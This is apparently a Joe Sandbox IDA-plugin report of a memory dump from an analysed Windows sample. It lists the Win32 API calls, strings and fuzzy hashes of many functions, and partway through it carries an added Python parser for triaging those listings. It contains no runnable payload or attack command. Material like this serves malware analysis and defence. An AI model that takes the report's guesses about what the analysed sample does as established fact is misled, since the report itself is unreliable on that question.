                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: f37fd1cd80a81c7db394306dc83ec755a93a3c11fc4eec703d3c2635b29bf8a5
                                                  • Instruction ID: eaa0c4a9230cf6d974f4b7f2315749f13a0e4be7abe392c2f556a3c759421df8
                                                  • Opcode Fuzzy Hash: f37fd1cd80a81c7db394306dc83ec755a93a3c11fc4eec703d3c2635b29bf8a5
                                                  • Instruction Fuzzy Hash: 8861BF75904269BFDB21CF64EC88EBE7BB8FB01304F544069F851A7650DB71AE06DB21
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C46FA5
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C46FA8
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C46FCC
                                                  • _memset.LIBCMT ref: 00C46FDD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C46FEF
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C47067
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: 1f54d7ecd91d90a7e6009852df83acc40d106afe3e9bb6cd8d7f69ad5fae3ddb
                                                  • Instruction ID: 199d0a899f6b952c499e6cbddb7b38d4ace29b83f6fea625d3c761e39759082e
                                                  • Opcode Fuzzy Hash: 1f54d7ecd91d90a7e6009852df83acc40d106afe3e9bb6cd8d7f69ad5fae3ddb
                                                  • Instruction Fuzzy Hash: 5B617A75900208AFDB11DFA4CC81FEE77F8BB09710F10419AFA14AB2A1C771AE45DB94
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C16BBF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C16C18
                                                  • VariantInit.OLEAUT32(?), ref: 00C16C2A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C16C4A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C16C9D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C16CB1
                                                  • VariantClear.OLEAUT32(?), ref: 00C16CC6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C16CD3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C16CDC
                                                  • VariantClear.OLEAUT32(?), ref: 00C16CEE
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C16CF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: e1e053ecfa916f3c4a0a79c396b64ef4d0b4527735eeb8800bfbcde6095a7344
                                                  • Instruction ID: 79d2118f781df0073e4fbe8d421320fb4729c3f76204561653daad99827e4d87
                                                  • Opcode Fuzzy Hash: e1e053ecfa916f3c4a0a79c396b64ef4d0b4527735eeb8800bfbcde6095a7344
                                                  • Instruction Fuzzy Hash: 36414035A001199FCF00DF68D858AEEBBB9FF49354F008069E955A7261DB30AA86DB90
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CoInitialize.OLE32 ref: 00C38403
                                                  • CoUninitialize.OLE32 ref: 00C3840E
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00C52BEC,?), ref: 00C3846E
                                                  • IIDFromString.OLE32(?,?), ref: 00C384E1
                                                  • VariantInit.OLEAUT32(?), ref: 00C3857B
                                                  • VariantClear.OLEAUT32(?), ref: 00C385DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 8954cc9680f94f93bd1453949cd1aec1270aa590ebed174da3aa89a208b303fb
                                                  • Instruction ID: a146a9267f7786dd52a78ccebdb73fbb7c463399afabc7ecd43dafd77f531ef0
                                                  • Opcode Fuzzy Hash: 8954cc9680f94f93bd1453949cd1aec1270aa590ebed174da3aa89a208b303fb
                                                  • Instruction Fuzzy Hash: 2D61DD70618312AFE710DF24C848F6EB7E8AF49754F00485DF9869B291CB70EE48CB92
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00C35793
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00C357D8
                                                  • gethostbyname.WSOCK32(?), ref: 00C357E4
                                                  • IcmpCreateFile.IPHLPAPI ref: 00C357F2
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35862
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35878
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C358ED
                                                  • WSACleanup.WSOCK32 ref: 00C358F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 6f8d5dfe6609169674021f5c2c9131f55be9d318b2df9b546c7dae7961751c04
                                                  • Instruction ID: 0547cfd3fbeeee4a1452dd95cc69c7dd6010cb3ff71299e4951192fd3e733e7c
                                                  • Opcode Fuzzy Hash: 6f8d5dfe6609169674021f5c2c9131f55be9d318b2df9b546c7dae7961751c04
                                                  • Instruction Fuzzy Hash: 2F519C31650700DFDB20AF25CC49B6AB7E4EF49720F044969F9A6DB2E1DB30E941DB42
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B4D0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C2B546
                                                  • GetLastError.KERNEL32 ref: 00C2B550
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00C2B5BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 63d06ca154b39835189603783160499dbb055712b48987964dc6b086df3311bb
                                                  • Instruction ID: a7c40f70d817907657ebff230fe328d2dcda399c7362b4e85b75d36c43429906
                                                  • Opcode Fuzzy Hash: 63d06ca154b39835189603783160499dbb055712b48987964dc6b086df3311bb
                                                  • Instruction Fuzzy Hash: D2319E35A40215AFDB00DBA8D849FAE7BB4FF09300F148079F9159B691DB709E46CB91
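The per-function "APIs" listings on this page (the Ping routine built on IcmpSendEcho and the drive-status routine built on GetDiskFreeSpaceW above, the menu, SafeArray and COM routines before them) all follow one line grammar: `Name.MODULE(arg,...), ref: ADDRESS`, where `?` marks an argument the disassembler could not resolve, the argument list may be absent, and a `Part of subcall function XXXX:` prefix marks a call made from a callee. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it turns that text into structured records so an analyst can triage hundreds of such blocks by API and module instead of scrolling. The embedded sample is copied from the two records immediately above and labelled as such; every helper name is this example's own. As a reading aid, the trailing `00000FA0` on the IcmpSendEcho calls is that function's Timeout parameter, 4000 ms.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the "APIs" records of the Ping and drive-status routines,
# copied from the report text above. Every record uses the same grammar, so a
# real run feeds the whole exported report instead.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00C35793
• inet_addr.WSOCK32(?,?,?), ref: 00C357D8
• gethostbyname.WSOCK32(?), ref: 00C357E4
• IcmpCreateFile.IPHLPAPI ref: 00C357F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C358ED
• WSACleanup.WSOCK32 ref: 00C358F3
• Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C2B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C2B546
• GetLastError.KERNEL32 ref: 00C2B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 00C2B5BD
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
"""

# One call line. The argument list is optional, "?" is an unresolved argument,
# and "Part of subcall function XXXX:" means the call sits in a callee.
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OFFSET_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+)")
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # raw tokens as printed in the report
    ref: int                          # virtual address of the call site
    subcall_of: Optional[int] = None  # callee address for "Part of subcall" lines


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # "String ID", split on "$"
    source_offset: Optional[int] = None          # dump base from "Source File"

    @property
    def string_id(self) -> str:
        return "$".join(self.strings)


def parse_report(text: str) -> list:
    """Return one FunctionRecord per "APIs" block in the report text."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip().lstrip("•").strip()
        if stripped == "APIs":              # header that opens a new record
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            current.calls.append(ApiCall(
                name=m.group("name"), module=m.group("module"),
                args=[a.strip() for a in raw.split(",")] if raw else [],
                ref=int(m.group("ref"), 16),
                subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
        elif stripped.startswith("String ID:"):   # not "API String ID:"
            value = stripped[len("String ID:"):].strip()
            current.strings = value.split("$") if value else []
        elif stripped.startswith("Source File:"):
            om = OFFSET_RE.search(stripped)
            current.source_offset = int(om.group("off"), 16) if om else None
    return records


def hex_args(call: ApiCall) -> list:
    """Arguments as ints where the report printed a hex constant, else None."""
    return [int(a, 16) if HEX_ARG_RE.match(a) else None for a in call.args]


def functions_calling(records: list, api_name: str, module: Optional[str] = None) -> list:
    """Records whose call list contains api_name (optionally from one module)."""
    return [r for r in records
            if any(c.name == api_name and (module is None or c.module == module)
                   for c in r.calls)]
```

Running `parse_report` over the whole exported report and then `functions_calling(records, "IcmpSendEcho")` returns only the Ping record; `hex_args` on its fifth call yields `[None, None, None, 5, 0, None, 0x29, 4000]`, the request size, reply size and timeout visible in the listing above. Strings embedded in the argument list (such as `READY`) and unresolved `?` arguments both come back as `None`, so a triage script never mistakes them for addresses.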
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C19014
                                                  • GetDlgCtrlID.USER32 ref: 00C1901F
                                                  • GetParent.USER32 ref: 00C1903B
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C1903E
                                                  • GetDlgCtrlID.USER32(?), ref: 00C19047
                                                  • GetParent.USER32(?), ref: 00C19063
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C19066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: f87d7581128ca8b132c091680313679b89ce244f7cf9fcde79958324bb4d3e33
                                                  • Instruction ID: 642e4526ba1eba39609d2d7a6d632d0d416b9ca147252a34085cee4d4961772b
                                                  • Opcode Fuzzy Hash: f87d7581128ca8b132c091680313679b89ce244f7cf9fcde79958324bb4d3e33
                                                  • Instruction Fuzzy Hash: 3121D374A00108BBDF04ABA0CC95FFEBBB4EF4A310F104169B961972E1DB755959EA20
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C190FD
                                                  • GetDlgCtrlID.USER32 ref: 00C19108
                                                  • GetParent.USER32 ref: 00C19124
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C19127
                                                  • GetDlgCtrlID.USER32(?), ref: 00C19130
                                                  • GetParent.USER32(?), ref: 00C1914C
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C1914F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 45545f1380492b4bd11dda2b00bec84be3ef6a2150d80a6af02906336cfeb08b
                                                  • Instruction ID: a5bd9857a79cb80624336a0e3a981646c34b6ff872647cb5cdfbe390867e76bc
                                                  • Opcode Fuzzy Hash: 45545f1380492b4bd11dda2b00bec84be3ef6a2150d80a6af02906336cfeb08b
                                                  • Instruction Fuzzy Hash: 70210774A01108BBDF10ABA0CC85FFEBBB8FF4A300F104069F921972A1DB755995EB20
                                                  APIs
                                                  • GetParent.USER32 ref: 00C1916F
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C19184
                                                  • _wcscmp.LIBCMT ref: 00C19196
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C19211
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: 0166640d1efe41b569dddee060746ab48620087c950bfa7b0ae71d72f2abef33
                                                  • Instruction ID: 7db2f059dd6a34e7ebe3c5ac23d01887ecf3d2590803015cc4097c9220af929a
                                                  • Opcode Fuzzy Hash: 0166640d1efe41b569dddee060746ab48620087c950bfa7b0ae71d72f2abef33
                                                  • Instruction Fuzzy Hash: 7E115C3A24830BB9FA102625DC1BEEB37ECDB13720B200176FA14A10E1FF7169917990
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C388D7
                                                  • CoInitialize.OLE32(00000000), ref: 00C38904
                                                  • CoUninitialize.OLE32 ref: 00C3890E
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00C38A0E
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C38B3B
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C52C0C), ref: 00C38B6F
                                                  • CoGetObject.OLE32(?,00000000,00C52C0C,?), ref: 00C38B92
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00C38BA5
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C38C25
                                                  • VariantClear.OLEAUT32(?), ref: 00C38C35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
                                                  • Opcode ID: 15f07b6be0200e037233ac549e6c403c25a484c73ca0cb5edbba744b749604e9
                                                  • Instruction ID: d9a016cc65918b293cc0d61fbdfc4987fd883ca00e2718dd2be91f1471fc2f2b
                                                  • Opcode Fuzzy Hash: 15f07b6be0200e037233ac549e6c403c25a484c73ca0cb5edbba744b749604e9
                                                  • Instruction Fuzzy Hash: 69C157B1618305AFD700DF24C884A2BB7E9FF89348F00496DF9999B251DB71ED4ACB52
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C27A6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ArraySafeVartype
                                                  • String ID:
                                                  • API String ID: 1725837607-0
                                                  • Opcode ID: 081cb824a358f714093e65ba9d420231b11394682dd0196d2ca7a20ba5cbe6c5
                                                  • Instruction ID: 915a58da0d516aa562c6d334cab888bdb95a337cc7cd25c5a16f1d2becbe602e
                                                  • Opcode Fuzzy Hash: 081cb824a358f714093e65ba9d420231b11394682dd0196d2ca7a20ba5cbe6c5
                                                  • Instruction Fuzzy Hash: 02B18C7590822A9FDB00DFA5E8C5BBEB7F4FF09321F204569E911E7641D734A981CB90
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C211F0
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C21204
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00C2120B
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C2121A
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2122C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C21245
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20268,?,00000001), ref: 00C21257
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C2129C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C212B1
                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20268,?,00000001), ref: 00C212BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: 8909189b702e9c14ad49d2a2eca529283bed2434c8f8e920c11bc38f04e35d2c
                                                  • Instruction ID: 9666459ac84e027a099a52aa173ccb31778d03ffa6aba2c630f4993c8ebfafc7
                                                  • Opcode Fuzzy Hash: 8909189b702e9c14ad49d2a2eca529283bed2434c8f8e920c11bc38f04e35d2c
                                                  • Instruction Fuzzy Hash: 4D31BD79600214FBEB109F94FC88BAE77A9EB65311F254129FE10CA5A0D7B49F40CB65
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BC2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BC223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BC2258
                                                  • GetClientRect.USER32(?), ref: 00BFBDBB
                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BFBDD2
                                                  • GetWindowDC.USER32(?), ref: 00BFBDDE
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFBDED
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFBDFF
                                                  • GetSysColor.USER32(00000005), ref: 00BFBE1D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                  • String ID:
                                                  • API String ID: 3430376129-0
